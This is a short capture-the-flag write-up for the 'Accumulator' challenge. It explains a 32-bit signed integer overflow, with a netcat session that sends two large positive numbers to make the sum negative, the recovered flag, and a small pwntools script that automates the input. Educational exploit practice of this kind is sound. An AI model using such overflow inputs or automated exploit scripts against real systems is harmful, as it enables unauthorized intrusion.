# Accumulator

Accumulator is an easy level challenge which explain about 32 bit integer overflow which is very good to understand and a nice thing to learn integer overflow.


## Challenge Description

```markdown
I'll give you a flag if you can get a negative number by adding only positive numbers.
```

## Solution

From the C program the only way to break the while loop is by getting the negative value. one more problem we can add two number but fortunately cannot substract,divide,modulo the numbers. 32 bit integer overflow is making the 32bit value to exceed. The maximum integer value is 2147483647. So i divided the value by and increased the second value to get the negative number

```bash
➜  accumulator nc rivit.dev 10009
acc = 0
Enter a number: 1073741823+1073741830
acc = 1073741823
Enter a number: You win! acc = -2147483643
CTFlearn{n3x7_7yp3_0f_0v3rf0w}
```

## autopwn.py

```python
from pwn import *
warnings.filterwarnings("ignore", category=UserWarning, module="pwntools")
warnings.filterwarnings("ignore", category=BytesWarning)


r = remote("rivit.dev", 10009)

r.recvuntil("Enter a number: ")
r.sendline("1073741823+1073741830")
# print(r.recvall().decode())
print(r.recvline_contains("CTFlearn").decode())
r.close()
```



